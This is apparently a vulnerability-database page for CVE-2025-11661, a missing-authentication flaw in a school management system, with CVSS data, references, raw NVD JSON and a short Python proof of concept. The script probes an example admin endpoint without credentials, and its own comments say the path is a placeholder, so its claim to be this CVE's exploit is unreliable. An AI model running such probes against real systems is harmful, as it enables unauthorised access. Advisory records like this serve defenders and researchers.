CVE-2025-11661

Description

A vulnerability was found in ProjectsAndPrograms School Management System up to 6b6fae5426044f89c08d0dd101c7fa71f9042a59. This affects an unknown part. Performing manipulation results in missing authentication. The attack is possible to be carried out remotely. The exploit has been made public and could be used. This product adopts a rolling release strategy to maintain continuous delivery

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:oranbyte:school_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

ProjectsAndPrograms School Management System < commit 6b6fae5426044f89c08d0dd101c7fa71f9042a59

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11661 PoC - Missing Authentication in ProjectsAndPrograms School Management System
# Exploit: Access restricted endpoints without authentication

import requests

# Target configuration
TARGET_URL = "http://target-school-mgmt-system.com"
VULNERABLE_ENDPOINT = "/admin/dashboard"  # Example restricted endpoint

def exploit_missing_auth(base_url, endpoint):
    """
    Exploit CVE-2025-11661: Access protected resources without authentication.
    The target application fails to enforce authentication checks on certain endpoints.
    """
    target = f"{base_url}{endpoint}"
    
    # Send request WITHOUT any authentication credentials
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Accept": "application/json, text/html"
    }
    
    try:
        response = requests.get(target, headers=headers, timeout=10, allow_redirects=False)
        
        if response.status_code == 200:
            print(f"[+] SUCCESS: Accessed {target} without authentication!")
            print(f"[+] Response length: {len(response.text)}")
            print(f"[+] Response preview: {response.text[:500]}")
            return response.text
        elif response.status_code == 302:
            print(f"[-] Redirected (possible auth check): {response.headers.get('Location')}")
        else:
            print(f"[-] Status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
    
    return None

if __name__ == "__main__":
    # Attempt to access restricted endpoint without authentication
    result = exploit_missing_auth(TARGET_URL, VULNERABLE_ENDPOINT)
    
    if result:
        print("\n[!] Vulnerability CVE-2025-11661 confirmed!")
        print("[!] The endpoint is accessible without proper authentication.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11661
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11661
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11661/
[4] VulDB https://vuldb.com/cve/CVE-2025-11661
[5] https://github.com/qqy-123/cve/issues/6
[6] https://vuldb.com/?ctiid.328078
[7] https://vuldb.com/?id.328078
[8] https://vuldb.com/?submit.665611

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11661", "sourceIdentifier": "[email protected]", "published": "2025-10-13T05:15:49.833", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in ProjectsAndPrograms School Management System up to 6b6fae5426044f89c08d0dd101c7fa71f9042a59. This affects an unknown part. Performing manipulation results in missing authentication. The attack is possible to be carried out remotely. The exploit has been made public and could be used. This product adopts a rolling release strategy to maintain continuous delivery"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-306"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oranbyte:school_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "8F87971A-DCBD-45DE-AAD5-1C55D4E81268"}]}]}], "references": [{"url": "https://github.com/qqy-123/cve/issues/6", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.328078", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.328078", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.665611", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}